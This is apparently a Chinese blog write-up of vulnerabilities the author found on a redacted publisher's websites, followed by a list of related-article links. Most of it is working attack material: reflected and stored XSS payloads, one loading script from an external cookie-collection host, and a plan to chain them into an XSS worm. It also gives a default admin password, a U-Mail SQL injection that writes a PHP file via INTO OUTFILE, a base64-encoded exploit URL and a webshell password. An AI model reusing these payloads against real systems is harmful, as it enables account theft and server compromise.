0x00 前言

之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。

0x01 主站XSS

主页搜索框,发现是get传参

http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E

个人中心XSS可打Cookie

基本资料,昵称处限制了长度,直接插入payload

<sCRiPt sRC=http://xss.pt/xxxx></sCrIpT>

下面这张图截错了,修改了昵称后就没法修改了所以没有新图可截,直接在昵称插入payload保存即可

访问个人中心
昵称处已经空了

http://www.*****.com/blog/2342589/taokejian.htm

结合前台搜索框get型xss,iframe框架隐藏嵌入我的主页链接到搜索框中,传播即可造成xss蠕虫

0x02 分站XSS

http://zy.*****.com/sp/getp****p.do

搜索框 弹一下 没啥卵用

0x03 某资源管理平台弱密码

弱口令就进去了

http://x***ewm.*****.com/index        admin   123456

0x04 邮箱系统SQL注入&Getshell&远程代码执行

U-mail挺老的邮件系统了,很多洞,经过测试,通过注入into outfile拿到shell

http://mail.*****.com/

1. 信息泄露

http://mail.*****.com/webmail/customer/autoresp.php
路径泄露:D:\umail\WorldClient\html\userapply.php
info:http://mail.*****.com//webmail/info.php

2. 注入写木马测试

aa’ union select 1,2,3,4,5,6,'<?php echo
phpinfo();?>’,8,9,10,11,12,13,14 into outfile
‘D:/umail/WorldClient/html/src.php’#

上面语句base64转码

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

访问:

http://mail.*****.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

3. getshell

http://mail.*****.com/webmail/sss.php        密码g

win2008  network service 可秒system,就到这了没再继续了。

实战挖掘某出版社漏洞集合相关推荐

  1. 2023 HW 必修高危漏洞集合

    2023 HW 必修高危漏洞集合 1 前言 2 漏洞汇总数据 反序列化 逻辑漏洞 命令执行 其他 3 自查高危详情 3.1泛微 e-cology9 FileDownloadForOutDoc SQL ...

  2. 【安全漏洞】Struts2漏洞集合总结

    Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...

  3. Python数据分析与实战挖掘

    <Python数据分析与实战挖掘> 张良均 基础篇 书推荐:<用python做科学计算> 扩展库 简介 Numpy数组支持,以及相应的高效处理函数 Scipy矩阵支持,以及相应 ...

  4. 【笔记】《Python数据分析与实战挖掘》

    <Python数据分析与实战挖掘> 张良均 基础篇 书推荐:<用python做科学计算> 扩展库 简介 Numpy数组支持,以及相应的高效处理函数 Scipy矩阵支持,以及相应 ...

  5. 用友OA/NC/NCCloud漏洞集合

    目录 0x01声明 0x02漏洞集合 web.xml prop.xml(数据库配置) 任意文件读取 bsh.servlet.BshServlet 远程命令执行漏洞 用友 NCCloud FS 文件管理 ...

  6. thinkcmfx漏洞太大_thinkcmf漏洞集合

    thinkcmf漏洞集合 在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充. ...

  7. Struts2 漏洞集合

    Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...

  8. FineCMS 5 0 10漏洞集合

    分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 笔记地址 ...

  9. 实战挖掘一个某公司网站漏洞

    作为一个资深安全菜鸟,主要是讲解常规挖洞的一个流程和思路,以找到的一个某公司sql注入为例,大佬轻喷 网上很多资料及博客都有讲解,通过搜索引擎寻找网站漏洞,实际上整个挖洞的过程基本上是撞大运,掏出谷歌 ...

最新文章

  1. 026_元素执行函数
  2. 成功解决Both binary classification-only and multiclassification-only loss function or metrics specified
  3. 【数据分析】Superset 之三 Docker操作管理
  4. 华为手机如何升级鸿蒙系统_华为鸿蒙2.0带来好消息 2021年部分华为手机能升级到鸿蒙2.0...
  5. 如何查看SharePoint Server的版本信息
  6. Robocode 直线瞄准机器人
  7. 通俗理解路由器和交换机的区别?
  8. android5.0 root工具,ROOT大师:Android 5.0 ROOT并没那么难
  9. STRATASYS 即将收购 ORIGIN,将全新增材制造平台引入聚合物生产领域
  10. RTMPLive多流媒体协议转无插件直播协议(RTMP)解决方案
  11. 蚂蚁的愤怒之源-上篇
  12. RK3288 EDP 调试
  13. H5网易注册页面实战
  14. 常用加密与解密算法示例代码
  15. 2018年带三维团队的一点总结
  16. linux系统硬盘设置密码,linux下硬盘加密
  17. 统计字符串中每个字符的出现字数
  18. 如何让word文档都在同一个窗口下打开 (反之亦可)
  19. 【博弈论】博弈论题单题解
  20. python制作工资计算器-Python计算个人所得税!

热门文章

  1. 学习笔记5--摄像头标定之内参标定
  2. 基于 openGauss 的五子棋 AI 项目,openGauss 设计一个 AI 小 demo
  3. CRL问题与OCSP
  4. 基于实用拜占庭共识算法(PBFT)的区块链模型的评估
  5. WebLogic 12c 配置 https
  6. MongoDB 的应用开发者生态建设调查及启示
  7. Android studio 二维码扫描的实现
  8. [小物分享] 金豪世纪
  9. 圣诞老人过悬崖小游戏源码
  10. 回填用土好还是砂石料好_砂与石子回填